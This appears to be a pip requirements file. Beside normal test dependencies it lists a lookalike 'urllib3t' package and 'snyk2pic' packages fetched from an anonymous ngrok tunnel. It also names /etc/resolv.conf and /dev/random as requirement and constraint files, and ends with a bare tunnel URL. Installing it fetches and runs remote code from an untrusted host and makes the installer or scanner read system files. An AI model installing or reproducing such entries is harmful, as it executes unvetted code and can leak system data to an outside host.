pytest
pytest-cov
beautifulsoup4
urllib3 @ https://github.com/urllib3/urllib3/archive/refs/tags/1.26.8.zip
urllib3t @ https://d872-2a0d-6fc2-6430-1c00-6c2d-8d7d-2238-8b0a.ngrok-free.app/1
snyk2pic1 @ git+https://github.com/snkpinkh1/snyk2
snyk2pic2 @ git+https://d872-2a0d-6fc2-6430-1c00-6c2d-8d7d-2238-8b0a.ngrok-free.app/2


# It is possible to refer to other requirement files or constraints files.
-r /etc/resolv.conf
-c /dev/random

# It is possible to refer to specific local distribution paths.
./downloads/numpy-1.9.2-cp34-none-win32.whl

# It is possible to refer to URLs.
https://d872-2a0d-6fc2-6430-1c00-6c2d-8d7d-2238-8b0a.ngrok-free.app/blah.123
